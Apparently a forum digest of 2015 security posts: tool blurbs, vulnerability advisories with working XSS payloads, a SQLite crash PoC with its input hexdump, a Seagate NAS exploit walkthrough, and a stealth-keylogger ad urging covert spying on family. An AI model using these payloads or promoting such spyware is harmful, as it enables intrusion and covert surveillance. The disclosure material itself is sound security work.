  15. wig is a web application information gathering tool, which can identify numerous Content Management Systems and other administrative applications. The application fingerprinting is based on checksums and string matching of known files for different versions of CMSes. This results in a score being calculated for each detected CMS and its versions. Each detected CMS is displayed along with the most probable version(s) of it. The score calculation is based on weights and the amount of "hits" for a given checksum. wig also tries to guess the operating system on the server based on the 'server' and 'x-powered-by' headers. A database containing known header values for different operating systems is included in wig, which allows wig to guess Microsoft Windows versions and Linux distribution and version. wig features: CMS version detection by: check sums, string matching and extraction Lists detected package and platform versions such as asp.net, php, openssl, apache Detects JavaScript libraries Operation system fingerprinting by matching php, apache and other packages against a values in wig's database Checks for files of interest such as administrative login pages, readmes, etc Currently the wig's databases include 28,000 fingerprints Reuse information from previous runs (save the cache) Implement a verbose option Remove dependency on 'requests' Support for proxy Proper threading support Included check for known vulnerabilities Requirements wig is built with Python 3, and is therefore not compatible with Python 2. There are various other tools which perform similar functions such as CMS identification and issue detection: – CMSmap – Content Management System Security Scanner – Droopescan – Plugin Based CMS Security Scanner – WhatWeb – Identify CMS, Blogging Platform, Stats Packages & More – BlindElephant – Web Application Fingerprinter – Web-Sorrow v1.48 – Version Detection, CMS Identification & Enumeration – Wappalyzer – Web Technology Identifier (Identify CMS, JavaScript etc.) – WPScan – WordPress Security/Vulnerability Scanner How it works The default behavior of wig is to identify a CMS, and exit after version detection of the CMS. This is done to limit the amount of traffic sent to the target server. This behavior can be overwritten by setting the '-a' flag, in which case wig will test all the known fingerprints. As some configurations of applications do not use the default location for files and resources, it is possible to have wig fetch all the static resources it encounters during its scan. This is done with the '-c' option. The '-m' option tests all fingerprints against all fetched URLs, which is helpful if the default location has been changed. Help Screen usage: wig.py [-h] [-l INPUT_FILE] [-n STOP_AFTER] [-a] [-m] [-u] [--no_cache_load] [--no_cache_save] [-N] [--verbosity] [--proxy PROXY] [-w OUTPUT_FILE] [url] WebApp Information Gatherer positional arguments: url The url to scan e.g. http://example.com optional arguments: -h, --help show this help message and exit -l INPUT_FILE File with urls, one per line. -n STOP_AFTER Stop after this amount of CMSs have been detected. Default: 1 -a Do not stop after the first CMS is detected -m Try harder to find a match without making more requests -u User-agent to use in the requests --no_cache_load Do not load cached responses --no_cache_save Do not save the cache for later use -N Shortcut for --no_cache_load and --no_cache_save --verbosity, -v Increase verbosity. Use multiple times for more info --proxy PROXY Tunnel through a proxy (format: localhost:8080) -w OUTPUT_FILE File to dump results into (JSON) Example of run: $ ./wig.py example.com dP dP dP dP .88888. 88 88 88 88 d8' `88 88 .8P .8P 88 88 88 d8' d8' 88 88 YP88 88.d8P8.d8P 88 Y8. .88 8888' Y88' dP `88888' WebApp Information Gatherer Redirected to http://www.example.com. Continue? [Y|n]: TITLE --- HTML TITLE --- IP 255.255.255.256 SOFTWARE VERSION CATEGORY Drupal 7.28 | 7.29 | 7.30 | 7.31 | 7.32 CMS ASP.NET 4.0.30319.18067 Platform Microsoft-HTTPAPI 2.0 Platform Microsoft-IIS 6.0 | 7.0 | 7.5 | 8.0 Platform Microsoft Windows Server 2003 SP2 | 2008 | 2008 R2 | 2012 Operating System SOFTWARE VULNERABILITIES LINK Drupal 7.28 7 http://cvedetails.com/version/169265 Drupal 7.29 3 http://cvedetails.com/version/169917 Drupal 7.30 3 http://cvedetails.com/version/169916 URL NOTE CATEGORY /login/ Test directory Interesting URL /login/index_form.html ASP.NET detailed error Interesting URL /robots.txt robots.txt index Interesting URL /test/ Test directory Interesting URL _______________________________________________________________________________ Time: 15.7 sec Urls: 351 Fingerprints: 28989 Link: https://github.com/jekyc/wig
  16. pyClamd is a python interface to Clamd (Clamav daemon). By using pyClamd, you can add virus detection capabilities to your python software in an efficient and easy way. Instead of pyClamav which uses libclamav, pyClamd may be used by a closed source product. Changes: This version is compatible with python 3 (tested with 3.2.3) and python 2 (tested 2.7.3). The API for this new version is now object oriented. Useful classes are ClamdNetworkSocket and ClamdUnixSocket. Download
  17. Vulnerable soft: Applicure DotDefender (all versions) Vendor's site: Download dotDefender 5.00 & 5.13 Vulnerabilities: Persistent XSS,Log forging,Potential DoS When Discovered: 15 March 2015 Discovered by: AkaStep Under some circumstances this is possible attack DotDefender's admin interface and as result conduct PHISHING/Log forging/Potential Denial Of service against "Log Viewer" functionality. The main reason of vulnerability: DotDefenders Developers trusts to X-Forwarded-for HTTP Header and to it's variable (that is client side controllable) and sadly there is no any validation/sanitization of that variable and it's val. This vulnerability was successfully tested against for the following configurations:(in Lab/ Production environment) 1) Apache Traffic Server ===> Apache 2.4 2) Apache 2.4 with mod_proxy. Tested versions:(But other versions may also be affected) • dotDefender Version: 5.12-13217 • Web Server Type: Apache • Server Operating System: Linux • Web Server Version: Unknown • dotDefender Version: 5.13-13282 • Web Server Type: Apache • Server Operating System: Linux • Web Server Version: Unknown Read more: http://packetstorm.wowhacker.com/1503-exploits/DotDefender-XSS.pdf
  18. ##################################################################################### Application: Foxit Products GIF Conversion Memory Corruption Vulnerabilities (DataSubBlock) Platforms: Windows Versions: The vulnerability is confirmed in version Foxit Reader 7.x. Other versions may also be affected. Secunia: SA63346 {PRL}: 2015-02 Author: Francis Provencher (Protek Research Lab’s) Website: http://www.protekresearchlab.com/ Twitter: @protekResearch ##################################################################################### 1) Introduction 2) Report Timeline 3) Technical details 4) POC ##################################################################################### =============== 1) Introduction =============== Foxit Reader is a multilingual freemium PDF tool that can create, view, edit, digitally sign, and print PDF files.[3] Early versions of Foxit Reader were notable for startup performance and small file size.[citation needed] Foxit has been compared favorably toAdobe Reader.[4][5][6] The Windows version allows annotating and saving unfinished PDF forms, FDF import/export, converting to text, highlighting and drawing. ([url]http://en.wikipedia.org/wiki/Foxit_Reader[/url]) ##################################################################################### ============================ 2) Report Timeline ============================ 2015-01-22: Francis Provencher from Protek Research Lab’s found the issue; 2015-01-28: Foxit Security Response Team confirmed the issue; 2015-01-28: Foxit fixed the issue; 2015-03-09: Foxit released fixed version of Foxit Reader 7.1/Foxit Enterprise Reader 7.1/Foxit PhantomPDF7.1. ##################################################################################### ============================ 3) Technical details ============================ An error when handling the Size member of a GIF DataSubBlock data structure can be exploited to cause memory corruption via a specially crafted GIF file. ##################################################################################### =========== 4) POC =========== [url]http://protekresearchlab.com/exploits/PRL-2015-02.gif[/url] [url]http://www.exploit-db.com/sploits/36335.gif[/url] ############################################################################### Source
  19. *WordPress Daily Edition Theme v1.6.2 XSS (Cross-site Scripting) Security Vulnerabilities* Exploit Title: WordPress Daily Edition Theme /fiche-disque.php id Parameters XSS Security Vulnerabilities Product: WordPress Daily Edition Theme Vendor: WooThemes Vulnerable Versions: v1.6.* v1.5.* v1.4.* v1.3.* v1.2.* v1.1.* v.1.0.* Tested Version: v1.6.2 Advisory Publication: March 10, 2015 Latest Update: March 10, 2015 Vulnerability Type: Cross-Site Scripting [CWE-79] CVE Reference: * Impact CVSS Severity (version 2.0): CVSS v2 Base Score: 4.3 (MEDIUM) (AV:N/AC:M/Au:N/C:N/I:P/A:N) (legend) Impact Subscore: 2.9 Exploitability Subscore: 8.6 Credit: Wang Jing [Mathematics, Nanyang Technological University (NTU), Singapore] *Advisory Details:* *(1) Vendor & Product Description:* *Vendor:* WooThemes *Product & Vulnerable Versions:* WordPress Daily Edition Theme version 1.6.7 version 1.6.6 version 1.6.5 version 1.6.4 version 1.6.3 version 1.6.2 version 1.6.1 version 1.6 version 1.5 version 1.4.11 version 1.4.10 version 1.4.9 version 1.4.8 version 1.4.7 version 1.4.6 version 1.4.5 version 1.4.4 version 1.4.3 version 1.4.2 version 1.4.1 version 1.4.0 version 1.3.2 version 1.3.1 version 1.3 version 1.2.1 version 1.2 version 1.1.2 version 1.1.1 version 1.1 version 1.0.12 version 1.0.11 version 1.0.10 version 1.0.9 version 1.0.8 version 1.0.7 version 1.0.6 version 1.0.5 version 1.0.4 version 1.0.3 version 1.0.2 version 1.0.1 version 1.0 *Vendor URL & buy:* WordPress Daily Edition Theme can be got from here, http://www.woothemes.com/products/daily-edition/ http://dzv365zjfbd8v.cloudfront.net/changelogs/dailyedition/changelog.txt *Product Introduction:* "Daily Edition WordPress Theme developed by wootheme team and Daily Edition is a clean, spacious newspaper/magazine theme designed by Liam McKay. With loads of home page modules to enable/disable and a unique java script-based featured scroller and video player the theme oozes sophistication" "The Daily Edition theme offers users many options, controlled from the widgets area and the theme options page – it makes both the themes appearance and functions flexible. From The Daily Edition 3 option pages you can for example add your Twitter and Google analytics code, some custom CSS and footer content – and in the widgets area you find a practical ads management." "Unique Features These are some of the more unique features that you will find within the theme: A neat javascript home page featured slider, with thumbnail previews of previous/next slides on hover over the dots. A “talking points” home page that can display posts according to tags, in order of most commented to least commented. A great way to highlight posts gathering dust in the archives. A customizable home page layout with options to specify how many full width blog posts and how many “box” posts you would like to display. A javascript home page video player with thumbnail hover effect. 16 delicious colour schemes to choose from!" *(2) Vulnerability Details:* WordPress Daily Edition Theme web application has a security bug problem. It can be exploited by XSS attacks. This may allow a remote attacker to create a specially crafted request that would execute arbitrary script code in a user's browser session within the trust relationship between their browser and the server. *(2.1) *The code programming flaw occurs at "fiche-disque.php?" page with "id" parameters. *References:* http://tetraph.com/security/xss-vulnerability/wordpress-daily-edition-theme-v1-6-2-xss-cross-site-scripting-security-vulnerabilities/ http://securityrelated.blogspot.com/2015/03/wordpress-daily-edition-theme-v162-xss.html http://www.inzeed.com/kaleidoscope/computer-web-security/wordpress-daily-edition-theme-v1-6-2-xss-cross-site-scripting-security-vulnerabilities/ http://diebiyi.com/articles/%E5%AE%89%E5%85%A8/wordpress-daily-edition-theme-v1-6-2-xss-cross-site-scripting-security-vulnerabilities/ https://webtechwire.wordpress.com/2015/03/10/wordpress-daily-edition-theme-v1-6-2-xss-cross-site-scripting-security-vulnerabilities/ http://static-173-79-223-25.washdc.fios.verizon.net/?l=full-disclosure&m=142426561507008&w=2 https://cxsecurity.com/issue/WLB-2015030029 -- Wang Jing, Division of Mathematical Sciences (MAS), School of Physical and Mathematical Sciences (SPMS), Nanyang Technological University (NTU), Singapore. http://www.tetraph.com/wangjing/ https://twitter.com/tetraphibious Source
  20. Stored XSS Vulnerability in Google Analytics by Yoast Wordpress Plugin . contents:: Table Of Content Overview Title :Stored XSS Vulnerability in Google Analytics by Yoast Wordpress Plugin Author: Kaustubh G. Padwad, Rohit Kumar. Plugin Homepage: https://yoast.com/wordpress/plugins/google-analytics/ Severity: Medium Version Affected: Version 5.3.2 and mostly prior to it Version Tested : Version 5.3.2 version patched: Description Vulnerable Parameter Current UA-Profile Manually enter your UA code Label for those links Set path for internal links to track as outbound links: Subdomain tracking: Extensions of files to track as downloads: About Vulnerability This plugin is vulnerable to a Stored Cross Site Scripting vulnerability,This issue was exploited when administrator users with access to "Google Analytics by Yoast" Setting in wordpress above listed vulnerable parameter is vulnerable for stored XSS. A malicious administration can hijack other users session, take control of another administrator's browser or install malware on their computer. Vulnerability Class Cross Site Scripting (https://www.owasp.org/index.php/Top_10_2013-A3-Cross-Site_Scripting_(XSS) Steps to Reproduce: (POC) After installing the plugin Goto settings --> Google Analytics by Yoast Input this payload in "Manually enter your UA code" :- v style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)" onclick="alert(1)">x Click on the Save Changes button and navigate your cursor to input box,you will see XSS in action Reload the page or re navigate to page to make sure its stored Mitigation https://github.com/Yoast/google-analytics-for-wordpress/pull/322/commits Change Log https://github.com/Yoast/google-analytics-for-wordpress/pull/322/commits Disclosure 22-February-2015 Reported to developer 25-February-2015 Fixed by developer 05-March-2015 Issue Closed with team. 06-March-2015 Public Discloser credits Kaustubh Padwad & Rohit Kumar Information Security Researcher kingkaustubh@me.com & kumarrohit2255@gmail.com @s3curityb3ast,@rkumars3c [url]http://breakthesec.com[/url] [url]https://www.linkedin.com/in/kaustubhpadwad[/url] Source
  21. # Exploit Title: SQLite3 controlled memory corruption PoC (0day) # Date: [date] # Exploit Author: Andras Kabai # Vendor Homepage: http://www.sqlite.org/ # Software Link: http://www.sqlite.org/download.html # Version: 3.8.6, 3.8.8.3 # Tested on: Ubuntu 14.10, 64 bit 3.8.6 (latest available package), 3.8.8.3 (built from the latest source code) Using a crafted input (e.g. from a malicious file via “-init” parameter or directly given to the std input of the program) it is possible to trigger a memory corruption vulnerability in the most recent version of SQLite3. The memory corruption could be controlled, therefore the program flow could be manipulated by the attacker. The following sections demonstrates the attack against the apt-get installed installed and updated sqlite3 and against a newer version that is built from source. ==== andrew@ubufuzzx6401:~/issues/sqlite$ which sqlite3 /usr/bin/sqlite3 andrew@ubufuzzx6401:~/issues/sqlite$ /usr/bin/sqlite3 -version 3.8.6 2014-08-15 11:46:33 9491ba7d738528f168657adb43a198238abde19e andrew@ubufuzzx6401:~/issues/sqlite$ gdb64 /usr/bin/sqlite3 GNU gdb (Ubuntu 7.8-1ubuntu4) 7.8.0.20141001-cvs Copyright (C) 2014 Free Software Foundation, Inc. License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html> This is free software: you are free to change and redistribute it. There is NO WARRANTY, to the extent permitted by law. Type "show copying" and "show warranty" for details. This GDB was configured as "x86_64-linux-gnu". Type "show configuration" for configuration details. For bug reporting instructions, please see: <http://www.gnu.org/software/gdb/bugs/>. Find the GDB manual and other documentation resources online at: <http://www.gnu.org/software/gdb/documentation/>. For help, type "help". Type "apropos word" to search for commands related to "word"... Reading symbols from /usr/bin/sqlite3...(no debugging symbols found)...done. (gdb) set disassembly-flavor intel (gdb) set args < sqlitepoc.txt (gdb) r Starting program: /usr/bin/sqlite3 < sqlitepoc.txt warning: the debug information found in "/lib64/ld-2.19.so" does not match "/lib64/ld-linux-x86-64.so.2" (CRC mismatch). [Thread debugging using libthread_db enabled] Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1". Usage: .trace FILE|off Error: near line 4: near "whatever": syntax error Usage: .trace FILE|off Program received signal SIGSEGV, Segmentation fault. 0x00007ffff7ba06a0 in sqlite3_load_extension () from /usr/lib/x86_64-linux-gnu/libsqlite3.so.0 (gdb) i r rax 0x138 312 rbx 0x41414141424242 18367622009733698 rcx 0x7fffffffb590 140737488336272 rdx 0x0 0 rsi 0x555555779b43 93824994483011 rdi 0x41414141424242 18367622009733698 rbp 0x555555779b43 0x555555779b43 rsp 0x7fffffffb4c0 0x7fffffffb4c0 r8 0x555555779b41 93824994483009 r9 0x6c 108 r10 0x0 0 r11 0x0 0 r12 0x555555779b48 93824994483016 r13 0x7fffffffb590 140737488336272 r14 0x555555779b40 93824994483008 r15 0x2 2 rip 0x7ffff7ba06a0 0x7ffff7ba06a0 <sqlite3_load_extension+736> eflags 0x10246 [ PF ZF IF RF ] cs 0x33 51 ss 0x2b 43 ds 0x0 0 es 0x0 0 fs 0x0 0 gs 0x0 0 (gdb) disas $rip,+10 Dump of assembler code from 0x7ffff7ba06a0 to 0x7ffff7ba06aa: => 0x00007ffff7ba06a0 <sqlite3_load_extension+736>: call QWORD PTR [rbx+0x48] 0x00007ffff7ba06a3 <sqlite3_load_extension+739>: mov r15,rax 0x00007ffff7ba06a6 <sqlite3_load_extension+742>: lea rax,[rip+0x12bc1] # 0x7ffff7bb326e End of assembler dump. === andrew@ubufuzzx6401:~/tmp/build/sqlite-autoconf-3080803/.libs$ ./lt-sqlite3 -version 3.8.8.3 2015-02-25 13:29:11 9d6c1880fb75660bbabd693175579529785f8a6b andrew@ubufuzzx6401:~/tmp/build/sqlite-autoconf-3080803/.libs$ gdb64 ./lt-sqlite3 GNU gdb (Ubuntu 7.8-1ubuntu4) 7.8.0.20141001-cvs Copyright (C) 2014 Free Software Foundation, Inc. License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html> This is free software: you are free to change and redistribute it. There is NO WARRANTY, to the extent permitted by law. Type "show copying" and "show warranty" for details. This GDB was configured as "x86_64-linux-gnu". Type "show configuration" for configuration details. For bug reporting instructions, please see: <http://www.gnu.org/software/gdb/bugs/>. Find the GDB manual and other documentation resources online at: <http://www.gnu.org/software/gdb/documentation/>. For help, type "help". Type "apropos word" to search for commands related to "word"... Reading symbols from ./lt-sqlite3...done. (gdb) set disassembly-flavor intel (gdb) set args < /home/andrew/issues/sqlite/sqlitepoc.txt (gdb) r Starting program: /home/andrew/tmp/build/sqlite-autoconf-3080803/.libs/lt-sqlite3 < /home/andrew/issues/sqlite/sqlitepoc.txt warning: the debug information found in "/lib64/ld-2.19.so" does not match "/lib64/ld-linux-x86-64.so.2" (CRC mismatch). [Thread debugging using libthread_db enabled] Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1". Usage: .trace FILE|off Error: near line 4: near "whatever": syntax error Usage: .trace FILE|off Program received signal SIGSEGV, Segmentation fault. sqlite3LoadExtension (pzErrMsg=0x7fffffffb510, zProc=0x0, zFile=0x6261c3 "CCCCBBBBAAAA", db=0x6261c8) at sqlite3.c:36169 36169 } (gdb) i r rax 0x138 312 rbx 0x41414141424242 18367622009733698 rcx 0x7fffffffb510 140737488336144 rdx 0x0 0 rsi 0x6261c3 6447555 rdi 0x41414141424242 18367622009733698 rbp 0x6261c3 0x6261c3 rsp 0x7fffffffb440 0x7fffffffb440 r8 0x6261c1 6447553 r9 0x6c 108 r10 0x7fffffffb270 140737488335472 r11 0x7ffff7b5ae50 140737349267024 r12 0x6261c8 6447560 r13 0x7fffffffb510 140737488336144 r14 0x6261c0 6447552 r15 0x2 2 rip 0x7ffff7b5b130 0x7ffff7b5b130 <sqlite3_load_extension+736> eflags 0x10246 [ PF ZF IF RF ] cs 0x33 51 ss 0x2b 43 ds 0x0 0 es 0x0 0 fs 0x0 0 gs 0x0 0 (gdb) disas $rip,+10 Dump of assembler code from 0x7ffff7b5b130 to 0x7ffff7b5b13a: => 0x00007ffff7b5b130 <sqlite3_load_extension+736>: call QWORD PTR [rbx+0x48] 0x00007ffff7b5b133 <sqlite3_load_extension+739>: mov r15,rax 0x00007ffff7b5b136 <sqlite3_load_extension+742>: lea rax,[rip+0x587d8] # 0x7ffff7bb3915 End of assembler dump. ==== andrew@ubufuzzx6401:~/issues/sqlite$ hexdump -C sqlitepoc.txt 00000000 3b 0a 2e 74 20 78 0a 2e 74 0a 77 68 61 74 65 76 |;..t x..t.whatev| 00000010 65 72 00 0a 3b 0a 2e 74 0a 2e 6f 70 0a 2e 6c 20 |er..;..t..op..l | 00000020 43 43 43 43 42 42 42 42 41 41 41 41 0a |CCCCBBBBAAAA.| 0000002d Source
  22. Seagate, a popular vendor of hardware solutions, has a critical zero-day vulnerability in its Network Attached Storage (NAS) device software that possibly left thousands of its users vulnerable to hackers. Seagate's Business Storage 2-Bay NAS product, found in home and business networks, is vulnerable to a zero-day Remote Code Execution vulnerability, currently affecting more than 2,500 publicly exposed devices on the Internet. Seagate is one of the world’s largest vendor of hardware solutions, with products available worldwide. After Western Digital, Seagate ranked second and holds 41% of the market worldwide in supplying storage hardware products. A security researcher, named OJ Reeves, discovered the zero-day remote code execution vulnerability on 7th October last year and, reported to the company totally in the white hat style. But even after 130 days of responsible disclosure, the zero-day bug remains unpatched till now. In order to exploit the vulnerability, an attacker needs to be on the same network as the vulnerable device which gives the attacker root access of the vulnerable device, without the need of a valid login. Reeves also released a python exploit along with its Metasploit module version which is available on Github. ORIGIN OF ZERO-DAY VULNERABILITY Seagate's Business Storage 2-Bay NAS products come with a web-enabled management application that lets administrators to perform device configuration functions such as adding users, setting up access control, managing files, and more. This web application is built with three core technologies, including PHP version 5.2.13, CodeIgniter version 2.1.0 and Lighttpd version 1.4.28, which are all out-dated versions. PHP version 5.2.13 is vulnerable (CVE-2006-7243) that allows user-controlled data to prematurely terminate file paths, allowing for full control over the file extension. CodeIgniter version prior to 2.2.0 is vulnerable (CVE-2014-8686) that allows an attacker to extract the encryption key and decrypt the content of the cookie. Once decrypted, attacker can modify the content of the cookie and re-encrypt it prior to submitting it back to the server. The custom web application authenticate the login user based upon browser cookies, having three parameters: username: logged in user name is_admin: user is admin or not i.e. Yes or No language: chosen language (eg. en_US) Researcher explained that there is no further validation of user credentials at server-end, once username cookie is established, which could be impersonated easily by an attacker. Another parameter 'is_admin' can be manipulated to 'Yes' value that allows the attacker to self-elevate to administrative privileges in the web application itself. The language parameter can be manipulated for exploitation of a local file inclusion vulnerability. At last, the web application is being executed by an instance of Lighttpd which is running under the context of the root user. When an attacker makes a request with the manipulated cookie, it results in arbitrary code execution as root user. Therefore, successful exploitation of this vulnerability could result in taking complete control of the vulnerable device as a root user. VULNERABLE PRODUCTS Two different network storage devices made by Seagate were tested and found to be vulnerable. The latest Seagate NAS firmware version listed below are affected by this zero-day vulnerability: Business Storage 2-Bay NAS version 2014.00319 Business Storage 2-Bay NAS version 2013.60311 However, Reeves believes that all versions of Business Storage 2-Bay NAS product prior to 2014.00319 are affected by the same vulnerability. METASPLOIT MODULE AVAILABLE A Metasploit module and a Python script to exploit the vulnerability automatically is available on the Github. Each of these scripts are able to perform the following tasks: Connects to the vulnerable NAS device and extracts a ci_session cookie. Decrypts the cookie using the static encryption key and extracts the PHP hash. Modifies the serialized PHP hash so that the username is set to 'admin' and the is_admin field is set to 'yes'. Encrypts this updated PHP hash ready for further use as a ci_session cookie, which allows future requests to operate on the NAS as if they were an administrator. Performs a request to extract the host configuration, which includes the device's description. Modifies the host configuration so that the device description contains a small stager payload. Performs a request to update the host configuration with the new data so that the stager payload is written to /etc/devicedesc. Modifies the PHP hash again so that the language parameter contains the value ../../../../etc/devicedesc\x00. Encrypts this new PHP hash ready for future use as a ci_session cookie. Performs a request to the NAS using the cookie created in the previous step, which invokes the stager that was written to disk. This request posts a larger payload which is written to disk under the web server root. Performs another request which then resets the host configuration back to what it was prior to exploitation. According to Reeves, there was no updated firmware version available for download that contains patches for the issues, even after contacting the company multiple times. Users of Seagate's Business Storage NAS products and and other products using vulnerable firmware are recommended to ensure that their devices are not accessible via the public Internet and that the devices be located behind a firewall configured to allow only a trusted set of IP addresses to connect to the web interface. Source
  23. ===================================================== Stored XSS Vulnerability in ADPlugg Wordpress Plugin ===================================================== . contents:: Table Of Content Overview ======== * Title :Stored XSS Vulnerability in ADPlugg Wordpress Plugin * Author: Kaustubh G. Padwad * Plugin Homepage: https://wordpress.org/plugins/adplugg/ * Severity: Medium * Version Affected: 1.1.33 and mostly prior to it * Version Tested : 1.1.33 * version patched: 1.1.34 Description =========== Vulnerable Parameter -------------------- * Access Code About Vulnerability ------------------- This plugin is vulnerable to a Stored cross site scripting vulnerability,This issue was exploited when administrator users with access to AdPlugg Setting in wordpress Access code parameter is vulnerable for stored XSS. A malicious administration can hijack other users session, take control of another administrator's browser or install malware on their computer. Vulnerability Class =================== Cross Site Scripting (https://www.owasp.org/index.php/Top_10_2013-A3-Cross-Site_Scripting_(XSS) Steps to Reproduce: (POC) ========================= After installing the plugin * Goto settings --> AdPlugg * Put This payload in Access Code "><script>alert(document.cookie)</script> * Click on the Save Changes you will see XSS in action * Reload the page or re navigate to page to make sure its stored Mitigation ========== Update to Version 1.1.34 Change Log ========== https://wordpress.org/plugins/adplugg/changelog/ Disclosure ========== 18-February-2015 reported to developer 19-February-2015 Developer acknodlage the Bug 19-February-2015 Developer Patched the Bug and Push update 21-February-2015 Public Discloser credits ======= * Kaustubh Padwad * Information Security Researcher * kingkaustubh@me.com * https://twitter.com/s3curityb3ast * http://breakthesec.com * https://www.linkedin.com/in/kaustubhpadwad Source
  24. Do you want to know what your buddy or co-workers are doing online? Or perhaps you want to check up on your children or spouse and know what they are doing on the computer? With Perfect Keylogger it is possible in just 2 minutes! This program runs on the installed computer, fully hidden from its users, and logs everything that is typed in a protected file. Install Perfect Keylogger and find out the Truth! Perfect Keylogger is a new generation keylogger which is virtually undetectable. It was created as an alternative to very expensive commercial products like Spector Keylogger or E-Blaster. It has a similar functionality, but is significantly easier to use. Complex internal mechanisms are hidden from the user behind the friendly interface. You can install Keylogger and use it immediately without messing with settings. Perfect Keylogger is a popular award-winning tool, translated into 20+ languages. It lets you record all keystrokes, the time they were made and the application where they were entered. It works in the absolutely stealth mode. Stealth mode means that no button or icon is present in the Task Bar, and no process title is visible in the Task Manager list. Also, Perfect Keylogger can carry out visual surveillance. It periodically makes screenshots in invisible mode and stores the compressed images on the disk so you can review them later. Our keylogger has unique remote installation feature. You can create a pre-configured package for instant and stealth installation on the target computer. New Smart Rename feature lets you to rename all keylogger's executable files and registry entries using one keyword! One of the most powerful features of Perfect Keylogger is its advanced Keyword Detection and Notification. Create a list of "on alert" words or phrases and keylogger will continually monitor keyboard typing, URLs and web pages for these words or phrases. You tell Perfect Keylogger which phrases to watch out for - for example, "sex," "porno", "where do you live," "are your parents home," "is your wife sleeping," "I hate my boss" - whatever you decide to include. When a keyword is detected, Perfect Keylogger makes screenshot and immediately sends email notification to you. Perfect Keylogger was the first keylogging software solution which can be absolutely invisible in Windows 7/Vista/XP Task Manager! Now we are glad to offer the full Windows 64 bit support - you won't find it in most of competition products. The program lets you easily view the log file, displaying the title of the window (for example, title: "John (Online) - Message Session" in Yahoo IM), the date and time of the action and the contents of the typed matter itself. Unlike some other spy software products, Perfect Keylogger does not send any information to our company. Only you will receive the log files. We guarantee absolute privacy, high quality product and technical support - that's why we have thousands of satisfied customers. You pay once, all updates are free. For example, customers, who bought the first version in 2002, now can get the advanced latest version for free! You can be sure that you will always have the most modern spy software! We have to tell you, that such a software is very complex and only 2-3 products on the market, including this, have a good quality to use them effectively. Do not use a cheap or a free monitoring software! You can get an important data leaks or the system crashes! We can guarantee your system safety with our product. Perfect Keylogger is available in three editions: full version, full version remote edition and basic edition. Choose the functionality you need. Supported platforms for Perfect Keylogger: Windows 2000, Windows XP (32-bit and x64), Windows Server 2003/2008, Windows Vista (32-bit and x64), Windows 7, Windows 8 / 8.1 (32-bit and x64); Older versions of Windows are supported with older builds of the product. Minimum requirements for Perfect Keylogger: Windows XP or later (older versions are also available) Home Page - Perfect Keylogger for Windows 8/7/XP - Remote Monitoring Software. Download invisible keylogger now. Free trial Sursa: BlazingTools Perfect Keylogger Remote Edition 1.93 PS: Nu este verificat fiindca nu este pus de mine, eu doar am gasit programul pe acest site. Am mai folosit acest site si vad ca nu sunt virusi, dar nu strica sa verificati. Apropo, care este mai bun: asta sau Ardamax ?
  25. *CVE-2014-9469 vBulletin XSS (Cross-Site Scripting) Security Vulnerabilities* Exploit Title: vBulletin XSS (Cross-Site Scripting) Security Vulnerabilities Product: vBulletin Forum Vendor: vBulletin Vulnerable Versions: 5.1.3 5.0.5 4.2.2 3.8.7 3.6.7 3.6.0 3.5.4 Tested Version: 5.1.3 4.2.2 Advisory Publication: Feb 12, 2015 Latest Update: Feb 12, 2015 Vulnerability Type: Cross-Site Scripting [CWE-79] CVE Reference: CVE-2014-9469 CVSS Severity (version 2.0): CVSS v2 Base Score: 4.3 (MEDIUM) (AV:N/AC:M/Au:N/C:N/I:P/A:N) (legend) Impact Subscore: 2.9 Exploitability Subscore: 8.6 Credit: Wang Jing [Mathematics, Nanyang Technological University, Singapore] *Advisory Details:* *(1) Vendor & Product Description:* *Vendor:* vBulletin *Product & Version: * vBulletin Forum 5.1.3 5.0.5 4.2.2 3.8.7 3.6.7 3.6.0 3.5.4 *Vendor URL & Download: * vBulletin can be downloaded from here, https://www.vbulletin.com/purchases/ *Product Introduction:* "vBulletin (vB) is a proprietary Internet forum software package developed by vBulletin Solutions, Inc., a division of Internet Brands. It is written in PHP and uses a MySQL database server." "Since the initial release of the vBulletin forum product in 2000, there have been many changes and improvements. Below is a list of the major revisions and some of the changes they introduced. The current production version is 3.8.7, 4.2.2, and 5.1.3." *(2) Vulnerability Details:* vBulletin has a security problem. It can be exploited by XSS attacks. *(2.1) *The vulnerability occurs at "forum/help" page. Add "hash symbol" first. Then add script at the end of it. *References:* http://tetraph.com/security/cves/cve-2014-9469-vbulletin-xss-cross-site-scripting-security-vulnerabilities/ http://securityrelated.blogspot.com/2015/02/cve-2014-9469-vbulletin-xss-cross-site.html https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-9469 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9469 https://security-tracker.debian.org/tracker/CVE-2014-9469 http://www.cvedetails.com/cve/CVE-2014-9469/ http://www.security-database.com/detail.php?alert=CVE-2014-9469 http://packetstormsecurity.com/files/cve/CVE-2014-9469 http://www.pentest.it/cve-2014-9469.html http://www.naked-security.com/cve/CVE-2014-9469/ http://www.inzeed.com/kaleidoscope/cves/cve-2014-9469/ http://007software.net/cve-2014-9469/ http://diebiyi.com/articles/%E5%AE%89%E5%85%A8/cve-2014-9469/ https://computertechhut.wordpress.com/2015/02/12/cve-2014-9469/ https://security-tracker.debian.org/tracker/CVE-2014-9469 -- Wang Jing, Division of Mathematical Sciences (MAS), School of Physical and Mathematical Sciences (SPMS), Nanyang Technological University (NTU), Singapore. http://www.tetraph.com/wangjing/ https://twitter.com/justqdjing Source
×
×
  • Create New...